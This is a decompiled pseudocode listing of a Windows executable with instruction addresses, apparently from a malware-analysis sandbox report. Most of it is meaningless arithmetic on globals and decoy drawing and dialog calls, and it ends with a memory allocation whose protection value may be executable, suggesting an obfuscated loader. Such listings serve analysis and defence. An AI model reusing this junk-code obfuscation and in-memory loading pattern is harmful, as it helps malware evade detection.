							E004132E0(_t884,  &(_v3272.nSamplesPerSec),  >=  ?  *0x44ca4c : _t1044, _t1158,  &(_v3364.y));
							_t884 = 0;
							_t1075 = 0;
							_t1108 = 0;
							_v3380.rgbReserved.hdc = 0;
							_t912 = 0;
							_v3332 = 0;
							_v3328 = 0;
							_v3380.fRestore = 0;
							_v3324 = 0;
							_v3340 = 0;
							__eflags = _t1158;
							if(_t1158 <= 0) {
								L111:
								_t1116 = 5;
								_t1080 = 0;
								__eflags = 0;
								do {
									KillTimer( *0x44d374, 2);
									__eflags = _v3296.x;
									if(_v3296.x != 0) {
										_t583 =  *0x44cdb4; // 0x0
										_t584 = _t583 *  *0x44d364;
										__eflags = _t584;
										 *0x44cb5c = _t584;
									} else {
										_t934 =  *0x44cdb4; // 0x0
										_t684 =  *0x44cb5c; // 0x2
										asm("cdq");
										_t912 = _t934 + 0x62;
										_t1080 = _t1080 + _t684 / (_t934 + 0x62) *  *0x44d364 -  *0x44d1ec;
									}
									_t1116 = _t1116 - 1;
									__eflags = _t1116;
								} while (_t1116 != 0);
								_t1081 = _v3380.fIncUpdate;
								_t1046 = 0;
								__eflags = _t1158;
								if(_t1158 > 0) {
									do {
										_t683 =  *0x44cdac; // 0x0
										_t912 =  *((intOrPtr*)(_t884 + _t1046));
										 *((char*)(_t1046 + _t683)) =  *((intOrPtr*)(_t884 + _t1046));
										_t1046 = _t1046 + 1;
										__eflags = _t1046 - _t1158;
									} while (_t1046 < _t1158);
								}
								_t585 =  *0x44c834; // 0x2
								_t1154 = 0;
								_t1036 =  *0x44cdac; // 0x0
								_v3364.y = _t585 + 0x54;
								_t587 = 0;
								_v3380.rgbReserved.hdc = _t1036;
								_v3380.fRestore = 0;
								__eflags = _v3312;
								if(_v3312 > 0) {
									_t946 =  *0x44d36c; // 0x0
									_t895 = 0;
									__eflags = 0;
									_t1088 = _v3364.y;
									do {
										_v3337 =  *((intOrPtr*)(_t1036 + _t587));
										_t895 = _t895 + 0x35 + _t1154 - _t946;
										__eflags = _t946;
										if(_t946 != 0) {
											_t967 = 0;
											_t1058 = ( *( *((intOrPtr*)(_t946 + 0x3c)) + _t946 + 6) & 0x0000ffff) - 1;
											__eflags = _t1058;
											if(_t1058 > 0) {
												do {
													_t967 = _t967 + 1;
													__eflags = (_t967 & 0x0000ffff) - _t1058;
												} while ((_t967 & 0x0000ffff) < _t1058);
											}
											MessageBoxA(GetActiveWindow(), "Application", "Error", 0x10);
										}
										_t660 = _t895 * _t1088;
										_t1108 = _t895 - _t1154;
										_v3336 = _t1154 * 0xffffffd3 - _t660 - _t1088 + _t1108 + _t895;
										__imp__MonitorFromWindow( *0x44d374, 0);
										 *0x44d37c = _t660;
										__eflags = _t1088;
										_t954 =  !=  ? (_v3344 ^ _v3345) & 0x000000ff : _v3380.fRestore & 0x000000ff;
										 *((char*)(_v3364.x + _v3380.fRestore)) =  !=  ? (_v3344 ^ _v3345) & 0x000000ff : _v3380.fRestore & 0x000000ff;
										_t912 =  *0x44d36c; // 0x0
										_v3312 = (_t895 + _t1088) * _v3344 * _t1108;
										__eflags =  *0x44d370 - _t912; // 0x770
										if(__eflags > 0) {
											__eflags = _t1088;
											if(_t1088 > 0) {
												_t1108 = _v3344;
												_v3336 = 0;
												_v3368 = _t1088;
												do {
													asm("cdq");
													_t671 =  &_v3296;
													_t895 = _t895 * (_t1154 * _t1088 * 0x17 - 0x4a /  &(_t912->i) - _v3312 + _t1108);
													__imp__MonitorFromRect(_t671, 2);
													_v3252.hdc = 0x28;
													GetMonitorInfoA(_t671,  &_v3252);
													asm("cdq");
													_t965 = _v3344;
													_v3344 = _t965 + _t1088;
													_t912 =  *0x44d36c; // 0x0
													_t1154 = _t1154 * 0xffffffda - 0x20 - (_t1108 * _t895 + _t965) * _v3320;
													_t340 =  &(_v3380.fErase);
													 *_t340 = _v3380.fErase - 1;
													__eflags =  *_t340;
												} while ( *_t340 != 0);
											}
											goto L129;
										}
										break;
										L129:
										_t1036 = _v3380.fRestore;
										_t587 = _v3364.x + 1;
										_v3364.x = _t587;
										__eflags = _t587 - _v3320;
									} while (_t587 < _v3320);
									_t1036 =  *0x44cdac; // 0x0
									_t884 = _v3380.fIncUpdate;
									_t1081 = _v3364.y;
								}
								_t1036->i =  &_v2656;
								__eflags = _t884;
								if(_t884 == 0) {
									L139:
									E00413130(_t884,  &(_v3272.nSamplesPerSec), _t1036, _t1154);
									L0041503F(_v3272.nSamplesPerSec);
									_t591 =  *0x44d1ec; // 0x9119dde3
									_t1176 = _t1172 + 4;
									_t1117 =  *0x44cdb0; // 0x0
									_t1082 =  *0x44cdb4; // 0x0
									_t1118 = _t1117 + 1;
									_v3328 = _t591;
									_t592 =  *0x44d364; // 0x76e
									_v3364.y = _t592;
									_t593 =  &(_v3380.fRestore);
									__imp__CoCreateInstance(0x437d90, 0, 0x17, 0x437d80, _t593);
									__eflags = _t593;
									if(__eflags >= 0) {
										_t893 = GetCurrentObject(_t1118, 6);
										_v3328 = _t893;
										_t629 = GetTextAlign(_t1118);
										_v3380.hdc = _t629;
										_t940 = _t629 & 0x00000001;
										__eflags = _t940;
										_v3340 = _t940;
										if(_t940 == 0) {
											_t652 = _t629 | 0x00000001;
											__eflags = _t652;
											SetTextAlign(_t1118, _t652);
										}
										MoveToEx(_t1118, _v3380.fRestore, _v3388,  &_v3364);
										_t632 = _v3400.x;
										_v3388 = 0;
										_t633 =  *((intOrPtr*)( *_t632 + 0x1c))(_t632, _t1118, _t893,  &_v3388);
										__eflags = _t633;
										if(_t633 >= 0) {
											__eflags = _t1082;
											if(_t1082 > 0) {
												while(1) {
													_t638 = _v3416;
													_t639 =  *((intOrPtr*)( *_t638 + 0x10))(_t638,  &_v3232, _t1082, _v3404,  &_v3388,  &_v3408);
													__eflags = _t639;
													if(_t639 < 0) {
														break;
													}
													_t1053 = _v3412;
													__eflags = _v3428 & _t1053;
													if((_v3428 & _t1053) == 0) {
														_t642 = _v3440;
														_t643 =  *((intOrPtr*)( *_t642 + 0x28))(_t642, _t1118, _t1053, 0,  &_v3444);
														__eflags = _t643;
														if(_t643 < 0) {
															break;
														} else {
															SelectObject(_t1118, _v3464);
															TextOutW(_t1118, 0, 0,  &(_v3288.y), _v3460);
															SelectObject(_t1118, _v3436);
															_t648 = _v3496;
															 *((intOrPtr*)( *_t648 + 0x20))(_t648, _v3500);
															goto L150;
														}
													} else {
														TextOutW(_t1118, 0, 0,  &(_v3272.cbSize), _v3432);
														L150:
														_t1082 = _t1082 - _v3496;
														__eflags = _t1082;
														if(_t1082 > 0) {
															continue;
														} else {
														}
													}
													goto L153;
												}
												TextOutW(_t1118, 0, 0,  &(_v3272.cbSize), _t1082);
											}
										}
										L153:
										_t634 = _v3416;
										 *((intOrPtr*)( *_t634 + 8))(_t634);
										__eflags = _v3380.fErase;
										if(__eflags == 0) {
											SetTextAlign(_t1118, _v3416);
											MoveToEx(_t1118, _v3408, _v3404, 0);
										}
									}
									_t889 =  *0x44d374; // 0x0
									_t1083 = BeginPaint(_t889,  &_v3252);
									_t596 = CreatePen(0, 1, 0);
									_v3388 = _t596;
									SelectObject(_t1083, _t596);
									MoveToEx(_t1083, 0x32, 0x82, 0);
									LineTo(_t1083, 0xfa, 0x82);
									MoveToEx(_t1083, 0x96, 0xe6, 0);
									_t601 = LineTo(_t1083, 0x96, 0x1e);
									asm("movsd xmm0, [0x437d58]");
									asm("movsd [esp+0x30], xmm0");
									do {
										asm("addsd xmm0, [0x437d50]");
										asm("cvttsd2si eax, xmm0");
										_t601 = SetPixel(_t1083, _t601, 0x82, 0);
										asm("movsd xmm0, [esp+0x30]");
										asm("addsd xmm0, [0x437d28]");
										asm("movsd xmm1, [0x437d48]");
										asm("comisd xmm1, xmm0");
										asm("movsd [esp+0x30], xmm0");
									} while (__eflags > 0);
									DeleteObject(_v3468);
									EndPaint(_t889,  &(_v3380.rgbReserved));
									_t1084 =  *0x44d374; // 0x0
									_t1121 = BeginPaint(_t1084,  &(_v3380.rgbReserved));
									SelectObject(_t1121, CreatePen(0, 3, 0xff0000));
									asm("movaps xmm0, [0x437d70]");
									asm("movups [esp+0x70], xmm0");
									asm("movaps xmm0, [0x437d60]");
									asm("movups [esp+0x88], xmm0");
									Polyline(_t1121,  &_v3400, 4);
									EndPaint(_t1084,  &_v3380);
									_t613 =  *0x44cdb0; // 0x0
									_push( &_v3504);
									_push(0);
									_t1122 =  *0x44d1ec; // 0x9119dde3
									_t1085 =  *0x44d364; // 0x76e
									_t614 = _t613 + 1;
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0x7fffffff);
									_push(0xa0);
									_push(0xffffffff);
									_push(0);
									_push( *0x44cdb4);
									_push( &_v3316);
									_push(_t614);
									L0041645A();
									__eflags = _t614;
									if(_t614 >= 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(_t1085);
										_push(_t1122);
										_push(_v3556);
										L00416466();
										_push( &_v3588);
										L00416460();
									}
									_t615 =  *0x44cdac; // 0x0
									_v3520 = _t615;
									_t616 =  *0x44b630; // 0xd65634aa
									_v3524 = E00412D70;
									_v3516 = _t616;
									_t617 = LoadMenuA(_v2852, 0x44cb60);
									_t1123 =  *0x44ca4c; // 0x0
									_t891 = _t617;
									_t618 =  *0x44d370; // 0x770
									_t1047 = 0;
									_t938 =  *0x44b630; // 0xd65634aa
									__eflags = _t618;
									if(_t618 > 0) {
										do {
											_t938 = _t938 + _t1047;
											 *0x44b630 = _t938;
											__eflags = _t938 - _t618;
											if(_t938 <= _t618) {
												goto L163;
											} else {
												__eflags = _t1123;
												if(_t1123 == 0) {
													goto L163;
												}
											}
											goto L164;
											L163:
											_t1047 = _t1047 + 1;
											__eflags = _t1047 - _t618;
										} while (_t1047 < _t618);
									}
									L164:
									_t1086 =  *0x44cdb4; // 0x0
									__eflags = _t1086;
									if(_t1086 == 0) {
										__eflags = _t891;
										if(_t891 != 0) {
											_t619 = 2;
										} else {
											asm("cdq");
											_t619 = _t618 + (_t1047 & 0x000001ff) >> 9;
										}
										_t620 = _t619 - 2;
										__eflags = _t620;
									} else {
										_t620 = 0;
									}
									__eflags = _t1123;
									if(_t1123 != 0) {
										L174:
										 *_t1086 = _t938;
									} else {
										__eflags =  *0x44ca40 - _t1123; // 0x770
										if(__eflags == 0) {
											goto L174;
										} else {
											__eflags =  *0x44d378 - _t1123; // 0x1770020
											if(__eflags == 0) {
												goto L174;
											} else {
												EnumFontsA(GetDC(_t1123), _t1123,  *(_t1176 + 0x34 + _t620 * 4), _t1123);
											}
										}
									}
									_t621 =  *0x44cdb4; // 0x0
									__eflags = _t621 -  *0x44d370; // 0x770
									if(__eflags < 0) {
										 *0x44d378 =  *(0x44d1f0 + _t621 * 4);
									}
									__eflags = 0;
									return 0;
								} else {
									_t1075 = _t1081 - _t884;
									__eflags = _t1075 - 0x1000;
									if(_t1075 < 0x1000) {
										L138:
										L0041503F(_t884);
										_t1172 = _t1172 + 4;
										goto L139;
									} else {
										__eflags = _t884 & 0x0000001f;
										if(__eflags != 0) {
											goto L180;
										} else {
											_t655 =  *(_t884 - 4);
											__eflags = _t655 - _t884;
											if(__eflags >= 0) {
												goto L181;
											} else {
												_t884 = _t884 - _t655;
												__eflags = _t884 - 4;
												if(__eflags < 0) {
													goto L182;
												} else {
													__eflags = _t884 - 0x23;
													if(__eflags > 0) {
														goto L183;
													} else {
														_t884 = _t655;
														goto L138;
													}
												}
											}
										}
									}
								}
							} else {
								do {
									_t274 = _t912 + 0x44a008; // 0x44a008
									_t1154 = _t274;
									__eflags = _t1154 - _t1108;
									if(_t1154 >= _t1108) {
										L103:
										__eflags = _t1108 - _t1075;
										if(_t1108 != _t1075) {
											L107:
											__eflags = _t1108;
											if(_t1108 != 0) {
												_t690 =  *_t1154;
												goto L109;
											}
											goto L110;
										} else {
											__eflags = _t1075 - _t1108 - 1;
											if(_t1075 - _t1108 >= 1) {
												goto L107;
											} else {
												__eflags = _t884 - _t1108 - 1 - 1;
												if(__eflags < 0) {
													goto L179;
												} else {
													_t1090 = _t1075 - _t884;
													_t1127 = _t1108 - _t884 + 1;
													_t704 = _t1090 >> 1;
													__eflags =  !_t704 - _t1090;
													_t1036 =  >=  ? _t704 + _t1090 : 0;
													__eflags = _t1036 - _t1127;
													_t1128 =  >=  ? _t1036 : _t1127;
													E00413000( &_v3328, _t1036,  >=  ? _t1036 : _t1127);
													_t1075 = _v3324;
													_t884 = _v3332;
													_t1108 = _v3328;
													_t912 = _v3340;
													_v3380.fRestore = _t1075;
													_v3380.rgbReserved.hdc = _t884;
													goto L107;
												}
											}
										}
									} else {
										__eflags = _t884 - _t1154;
										if(_t884 > _t1154) {
											goto L103;
										} else {
											_t1154 = _t1154 - _t884;
											__eflags = _t1108 - _t1075;
											if(_t1108 != _t1075) {
												L101:
												__eflags = _t1108;
												if(_t1108 != 0) {
													_t690 =  *((intOrPtr*)(_t884 + _t1154));
													L109:
													 *_t1108 = _t690;
												}
												goto L110;
											} else {
												__eflags = _t1075 - _t1108 - 1;
												if(_t1075 - _t1108 >= 1) {
													goto L101;
												} else {
													__eflags = _t884 - _t1108 - 1 - 1;
													if(__eflags < 0) {
														L179:
														_push("vector<T> too long");
														E004136FB(_t884, _t1075, __eflags);
														L180:
														E0041A825(_t884, _t912, _t1036, __eflags);
														L181:
														E0041A825(_t884, _t912, _t1036, __eflags);
														L182:
														E0041A825(_t884, _t912, _t1036, __eflags);
														L183:
														E0041A825(_t884, _t912, _t1036, __eflags);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_t1173 = _t1172 - 0x16c;
														__eflags =  *0x44d364;
														if( *0x44d364 != 0) {
															_t572 =  *0x44b630; // 0xd65634aa
															_t573 = _t572 -  *0x44cb5c;
															__eflags = _t573;
															 *0x44cb5c = _t573;
														}
														_push(_t1108);
														_v3740 = 0;
														_push( &_v3744);
														_t505 =  &_v3740;
														_v3744 = 0;
														_push(_t505);
														_push(0);
														_push(0);
														_push(0); // executed
														L00416454(); // executed
														_t1109 = _t505;
														__eflags = _t1109;
														if(_t1109 == 0) {
															_t1110 =  *0x44ca40; // 0x770
															_t1109 = _t1110 + 0x25b;
															__eflags = _t1109;
														} else {
															 *0x44cdb4 = 0;
														}
														__eflags = _v3400.y;
														if(_v3400.y == 0) {
															__eflags =  *0x44d368;
															if(__eflags == 0) {
																_push(0xa47);
																E0041FCE9(_t884, _t1036, _t1075, _t1109, __eflags, _t1224, L"_hinst != NULL", L"build.cpp");
																_t1173 = _t1173 + 0xc;
															}
														}
														 *0x44d1ec =  *0x44d1ec + 1;
														_t506 =  *0x44cb5c; // 0x2
														_t913 =  *0x44ca4c; // 0x0
														__eflags =  *0x44cdb4 - _t506; // 0x0
														if(__eflags <= 0) {
															_t507 = _t506 + 0x13a;
															__eflags = _t507;
															 *0x44cb5c = _t507;
														} else {
															_t568 =  *0x44b630; // 0xd65634aa
															 *0x44cdb4 = 0;
															 *0x44b630 = _t568 + 0x1d4 + _t913;
														}
														_push(_t884);
														 *0x44d364 =  *0x44d364 + 0xfffffffe - _t913;
														_t510 =  *0x44ca44; // 0x76d
														_push(_t1154);
														_push(_t1075);
														_push(0x2400);
														_push(0x1f40);
														 *0x44ca44 = _t510 + 0x512 + _t1109; // executed
														_t513 = E0041A956();
														_t1155 =  *0x44ca4c; // 0x0
														_t1174 = _t1173 + 8;
														_t1076 = _t513;
														_v3764 = _t1076;
														 *0x44ca40 = GetLastError();
														_t515 = PathFindFileNameA(0x44cb60);
														_t1111 =  *0x44b630; // 0xd65634aa
														_v3748 = _t515;
														_t516 =  *0x44cb5c; // 0x2
														_v3760 = _t516;
														_t517 = GetDlgItem( *0x44ca4c, _t1111);
														_t1037 =  *0x44ca40; // 0x770
														_t885 = _t517;
														_t914 =  *0x44b630; // 0xd65634aa
														_v3696 =  &_v3656;
														_t519 =  *0x44d1ec; // 0x9119dde3
														_v3752 = _t885;
														_v3716 = 1;
														_v3692 = 0x100;
														_v3708 = 1;
														 *0x44b630 = _t914 + _t1037 + 0x32 + (_t1037 + 0x32) * 2;
														_t917 =  *0x44cdb4; // 0x0
														_t920 = _t917 -  *0x44ca4c + 0x22 + _t1076;
														_v3756 = _t920;
														__eflags = _t519 + _t920;
														if(_t519 + _t920 != 0) {
															 *0x44cb5c =  *0x44cb5c + 1;
															__eflags =  *0x44cb5c;
														}
														SendMessageA(_t885, 0x102d, _t1111,  &_v3716);
														_t523 =  *0x44d364; // 0x76e
														 *0x44cb5c = (_v3400.y -  *0x44b630 - 1) * (_t523 +  *0x44b630);
														StrToIntExA( &_v3656, 1,  &_v3744);
														_t528 =  *0x44cdb4; // 0x0
														 *0x44d364 = (_t528 + 1) *  *0x44b630 * 0x96 +  *0x44d1ec;
														_t533 =  *0x44cb5c; // 0x2
														 *0x44b630 = _t533 + _t533 * 2 + _t533 + _t533 * 2;
														_t536 =  *0x44ca44; // 0x76d
														 *0x44ca40 =  *0x44ca40 + _t536;
														 *0x44cdc4 = CreatePen(0, 1, GetSysColor(0x16));
														SendMessageA(_v3772, 0x102d, _v3780,  &_v3736);
														_t541 =  *0x44c834; // 0x2
														_v3776 = _v3776 + _t1155 + (_t541 + 0x32 + _t1076) * 2 + _t541 + 0x32 + _t1076;
														StrToIntExA( &_v3676, 1,  &_v3760);
														_t1113 = 0;
														__eflags = 0;
														do {
															_t451 = _t1113 + 1; // 0x1
															_t887 = _t451;
															wnsprintfA( &_v3764, 0x14, "%Xh (%u, LPT%u)",  *(0x437cb0 + _t1113 * 2) & 0x0000ffff,  *(0x437cb0 + _t1113 * 2) & 0x0000ffff, _t887);
															_t1077 =  *0x44c830; // 0x0
															_t1174 = _t1174 + 0x18;
															_t1043 =  *0x44cdb4; // 0x0
															_t1078 = _t1077 *  *0x44d1ec;
															_t454 = _t1043 + 2; // 0x2
															 *0x44d364 = _t454 + _t454 * 2 + _t1077 * _v3788 +  *0x44b630;
															 *0x44d378 = _v3788;
															 *0x44d370 = _t1113 * _t1043 +  *0x44ca40;
															SendMessageA(_t1155, 0x143, 0,  &_v3760);
															__eflags = _v3788 -  *(0x437cb0 + _t1113 * 2);
															if(_v3788 ==  *(0x437cb0 + _t1113 * 2)) {
																_t927 =  *0x44d1ec; // 0x9119dde3
																_t563 =  *0x44cdb4; // 0x0
																_t565 = 1 + _t563 * 2 + (_t927 -  *0x44cb5c) * _t1078 + _v3780;
																__eflags = _t565;
																 *0x44d364 = _t565;
																SendMessageA(_t1155, 0x14e, _t1113, 0);
																_t567 =  *0x44c830; // 0x0
																 *0x44d1ec = _t567;
															}
															_t1113 = _t887;
															__eflags = _t1113 - 3;
														} while (_t1113 < 3);
														_t1114 = _v3772;
														_t560 = StrChrA(_t1114, 0x20);
														__eflags = _t560;
														if(_t560 == 0) {
															PathFindExtensionA(_t1114);
														}
														__eflags = 0;
														return 0;
													} else {
														_t1089 = _t1075 - _t884;
														_t1130 = _t1108 - _t884 + 1;
														_t697 = _t1089 >> 1;
														__eflags =  !_t697 - _t1089;
														_t1036 =  >=  ? _t697 + _t1089 : 0;
														__eflags = _t1036 - _t1130;
														_t1131 =  >=  ? _t1036 : _t1130;
														E00413000( &_v3328, _t1036,  >=  ? _t1036 : _t1130);
														_t1075 = _v3324;
														_t884 = _v3332;
														_t1108 = _v3328;
														_t912 = _v3340;
														_v3380.fRestore = _t1075;
														_v3380.rgbReserved = _t884;
														goto L101;
													}
												}
											}
										}
									}
									goto L204;
									L110:
									_t1158 = _v3312;
									_t912 =  &(_t912->i);
									_t1108 = _t1108 + 1;
									_v3336 = _t912;
									_v3324 = _t1108;
									__eflags = _t912 - _t1158;
								} while (_t912 < _t1158);
								goto L111;
							}
						}
					} else {
						_v2620 = _t777;
						 *_t777 = _t1072;
						_t777[1] = _t1072;
						_v2625 = 0;
						 *_v2620 =  &_v2620;
						E00413250(_t883,  &_v2620, _t1032, _t1153,  &_v2625);
						_v2600 =  &_v1852 - ( *0x44ca4c & 0x000000ff) - ( &_v1596 & 0x0000ffff);
						if(_v2608 != _t1072) {
							asm("movd xmm0, dword [0x44c834]");
							_t1136 =  *0x44ca44; // 0x76d
							__eflags = _t1136 -  *0x44d374;
							asm("cvtdq2ps xmm0, xmm0");
							asm("cvtps2pd xmm0, xmm0");
							_t784 = E0041FDF0(_t1032, _t1224);
							asm("movd xmm1, esi");
							asm("cvtsd2ss xmm0, xmm0");
							asm("cvtdq2ps xmm1, xmm1");
							asm("subss xmm1, xmm0");
							asm("cvttss2si eax, xmm1");
							 *0x44d1ec = _t784;
						} else {
							asm("movd xmm0, dword [0x44cdb4]");
							asm("cvtdq2pd xmm0, xmm0");
							E00420540(_t1032, _t1224);
							asm("divsd xmm0, [0x437d38]");
							asm("movd xmm1, eax");
							asm("cvtdq2pd xmm1, xmm1");
							asm("addsd xmm0, xmm1");
							asm("xorps xmm1, xmm1");
							asm("subsd xmm1, xmm0");
							asm("cvttsd2si edi, xmm1");
						}
						_t785 =  *0x44d370; // 0x70
						_v2625 = _t785;
						E00413250(_t883,  &_v2620, _t1032, _t1153,  &_v2625);
						_t788 =  *0x44d364; // 0x76e
						 *0x44d1ec = _t788 *  *0x44ca4c;
						if(_v2608 == 0) {
							asm("movd xmm0, edi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("movsd [esp+0x50], xmm0");
							_t1225 = _v2592.bmiHeader;
							_v2672 = _t1225;
							E00420810( &_v2620);
							_t997 =  *0x44ca44; // 0x76d
							_t791 =  *0x44cdb4; // 0x0
							asm("cdq");
							_v2592.bmiHeader = _t1225;
							_t998 = _t997 + 0x62;
							asm("movsd xmm1, [esp+0x48]");
							_t152 = _t791 % _t998;
							__eflags = _t152;
							_t1032 = _t152;
							asm("movd xmm0, eax");
							asm("cvtdq2pd xmm0, xmm0");
							asm("mulsd xmm1, xmm0");
							asm("cvttsd2si eax, xmm1");
							 *0x44d1ec = _t791 / _t998;
						} else {
							asm("movd xmm0, dword [esp+0x7c]");
							asm("cvtdq2pd xmm0, xmm0");
							asm("movsd [esp+0x50], xmm0");
							_t1225 = _v2592.bmiHeader;
							_v2672 = _t1225;
							_t827 = E00420810( &_v2620);
							asm("movd xmm0, dword [0x44b630]");
							asm("cvtdq2pd xmm0, xmm0");
							_v2592.bmiHeader = _t1225;
							asm("movsd xmm1, [esp+0x48]");
							asm("subsd xmm1, xmm0");
							asm("movd xmm0, edi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("subsd xmm1, xmm0");
							asm("cvttsd2si eax, xmm1");
							_v2624 = _t827;
						}
						_t793 =  *0x44ca40; // 0x70
						_v2625 = _t793;
						E00413250(_t883,  &_v2620, _t1032, _t1153,  &_v2625);
						_v2629 = 1;
						E00413250(_t883,  &_v2624, _t1032, _t1153,  &_v2629);
						_t161 =  &_v2612;
						 *_t161 = _v2612 - 1;
						if( *_t161 != 0) {
							_t164 =  &_v2608;
							 *_t164 = _v2608 + 1;
							__eflags =  *_t164;
						} else {
							_v2608 = 0;
						}
						asm("movd xmm0, dword [0x44b630]");
						asm("cvtdq2pd xmm0, xmm0");
						E00420710(_t1225);
						_t1091 =  *0x44cdb4; // 0x0
						asm("movaps xmm2, xmm0");
						asm("divsd xmm2, [0x437d40]");
						_t1138 = _a4;
						asm("cdq");
						_t167 = _t1091 + 0x3d; // 0x3d
						_t1001 = _t167;
						asm("movd xmm1, dword [0x44cdc4]");
						asm("cvtdq2pd xmm1, xmm1");
						asm("movd xmm0, esi");
						asm("subsd xmm2, xmm1");
						asm("movd xmm1, eax");
						_t801 =  *0x44d370; // 0x770
						asm("cvtdq2pd xmm1, xmm1");
						asm("cvtdq2pd xmm0, xmm0");
						asm("subsd xmm2, xmm1");
						asm("addsd xmm2, xmm0");
						asm("movsd xmm0, [0x437d30]");
						asm("subsd xmm0, xmm2");
						if(_t1138 != _t801 || _t1091 != 0x10) {
							_t1095 = _t1091 *  *0x44d364 *  *0x44b630 *  *0x44c830 + 0x40;
							__eflags = _t1095;
						} else {
							_t1064 = _v2624;
							_t1001 = (_t1064 & 0x000000ff) + _v2504.nNumberOfLinks;
							if(_t1001 > (_v2504.dwVolumeSerialNumber & 0x000000ff)) {
								_t1005 =  *0x44ca4c; // 0x0
								asm("cdq");
								_t1097 =  *0x44c924; // 0x0
								_t1001 = _v2504.nNumberOfLinks & 0x000000ff;
								_t1095 = _t1097 + 0x10 + _t1064 / (_t1005 + 0x57) * _v2504.nFileSizeHigh * _v2544 * _v2596 + _t1001 -  *0x44d378;
								_t801 =  *0x44d370; // 0x770
							} else {
								_t1095 = _t1064 + 0x4b + 0 - _v2536;
								_t801 =  *0x44d370; // 0x770
							}
						}
						asm("cvttsd2si ecx, xmm0");
						if(_t1001 != 0) {
							asm("movd xmm0, esi");
							asm("cvtdq2ps xmm0, xmm0");
							asm("cvtps2pd xmm0, xmm0");
							E0041FFB0();
							asm("cvtsd2ss xmm0, xmm0");
							asm("cvttss2si esi, xmm0");
						} else {
							_t1138 = _t1138 - _t801;
						}
						_t1063 =  *0x44ca40; // 0x770
						_t1002 =  *0x44d36c; // 0x0
						if(_t1138 != 0 ||  *0x44d374 <= 0x4d) {
							 *0x44cc64 = 0x100;
						} else {
							 *0x44cc64 = _t1002 * _t1063 *  *0x44ca4c;
						}
						if(_t1063 < _t1002) {
							asm("movd xmm0, dword [esp+0x28]");
							asm("cvtdq2ps xmm0, xmm0");
							asm("cvtps2pd xmm0, xmm0");
							E0041FDF0(_t1063, _t1225);
							asm("xorps xmm1, xmm1");
							asm("cvtsd2ss xmm1, xmm0");
							asm("movd xmm0, dword [0x44d36c]");
							asm("cvtdq2ps xmm0, xmm0");
							asm("movd xmm2, esi");
							asm("mulss xmm1, xmm0");
							asm("movd xmm0, dword [esp+0x44]");
							asm("cvtdq2ps xmm2, xmm2");
							asm("cvtdq2ps xmm0, xmm0");
							asm("subss xmm2, xmm1");
							asm("subss xmm2, xmm0");
							asm("movd xmm0, eax");
							asm("cvtdq2ps xmm0, xmm0");
							asm("subss xmm2, xmm0");
							asm("cvttss2si eax, xmm2");
							 *0x44d1ec =  *0x44ca54 & 0x0000ffff;
						}
						E00417660(_t1095,  &_v2360, 0, 0x1fc);
						_v2360.uFlags = 2;
						_t805 = VirtualAlloc(0, _t883, 0x3000, _t1095); // executed
						 *0x44ca54 = _t805;
						Shell_NotifyIconA(1,  &_v2360); // executed
						E00413130(_t883,  &_v2628, _t1063, _t1153);
						L0041503F(_v2628);
						return 0;
					}
				}
				L204:
			}

0x004112e0
0x004112e1
0x004112e6
0x004112ec
0x004112fa
0x004112ff
0x00411309
0x0041130f
0x00411311
0x00411312
0x0041131a
0x00411325
0x0041132b
0x0041132d
0x00411332
0x00411335
0x0041133f
0x00411348
0x0041134c
0x0041136d
0x00411376
0x00411378
0x0041137c
0x00411380
0x00411384
0x00411391
0x00411391
0x0041139b
0x004113a1
0x004113a6
0x004113a6
0x004113ab
0x004113ad
0x004113b1
0x004113b7
0x004113c0
0x004113c2
0x004113c2
0x004113c2
0x004113b7
0x004113cd
0x004113da
0x004113e2
0x004113ea
0x004113f2
0x004113f7
0x004113ff
0x00411407
0x0041140c
0x00411411
0x00411db8
0x00000000
0x00411417
0x00411417
0x0041141f
0x00411425
0x00411435
0x00411437
0x00411445
0x00411451
0x00411457
0x00411460
0x00411460
0x0041146f
0x00411474
0x00411474
0x00411479
0x00411485
0x00411485
0x00411485
0x0041147b
0x0041147b
0x0041147b
0x00411490
0x004114b2
0x004114b2
0x004114bc
0x004114c5
0x004114ca
0x004114cf
0x004114d2
0x004114d6
0x004114dc
0x004114e0
0x004114e6
0x004114f7
0x004114f9
0x004114fd
0x00411505
0x0041150b
0x00411511
0x0041151f
0x00411521
0x0041153b
0x0041155a
0x00411560
0x00411566
0x00411573
0x0041157a
0x00411583
0x00411587
0x0041159b
0x004115a5
0x004115aa
0x004115ac
0x004115b4
0x004115bb
0x004115c1
0x004115c5
0x004115c9
0x004115cd
0x004115d3
0x004115d6
0x004115d6
0x004115e0
0x004115e3
0x004115ed
0x004115fa
0x0041160f
0x00411619
0x00411623
0x0041162e
0x00411639
0x00411644
0x0041164f
0x0041165a
0x0041166e
0x00411672
0x00411674
0x0041167a
0x00411685
0x0041168b
0x00411691
0x004116db
0x004116e1
0x004116e7
0x004116ec
0x004116ec
0x004116f0
0x004116f0
0x004116f2
0x004116f3
0x004116f3
0x004116f7
0x004116f7
0x00411704
0x0041170a
0x00411693
0x00411697
0x0041169d
0x00000000
0x0041169f
0x004116a3
0x004116a9
0x00000000
0x004116ab
0x004116ab
0x004116bb
0x004116c7
0x004116cd
0x004116d3
0x004116d3
0x004116a9
0x0041169d
0x00411719
0x0041171f
0x00411721
0x00411728
0x0041172e
0x00411730
0x00411730
0x00411734
0x00411749
0x00411750
0x00411751
0x00411730
0x00411755
0x00411755
0x00411760
0x004117bf
0x004117c4
0x004117c7
0x004117d9
0x004117e4
0x004117f2
0x004117fb
0x00411806
0x00411811
0x0041181c
0x00411827
0x00411832
0x0041183d
0x00411848
0x00411762
0x00411762
0x00411767
0x00411769
0x0041176f
0x00411780
0x00411795
0x0041179b
0x0041179c
0x004117a5
0x004117ac
0x004117ac
0x00411856
0x0041185d
0x00411861
0x00411864
0x0041186a
0x0041186f
0x00411875
0x00411879
0x00411879
0x00411511
0x00411883
0x00411888
0x00411890
0x004118a1
0x004118b4
0x004118bb
0x004118c1
0x004118c6
0x004118c9
0x004118cc
0x004118d6
0x004118de
0x004118e7
0x004118ec
0x0041191d
0x00411927
0x00411938
0x0041193d
0x0041194b
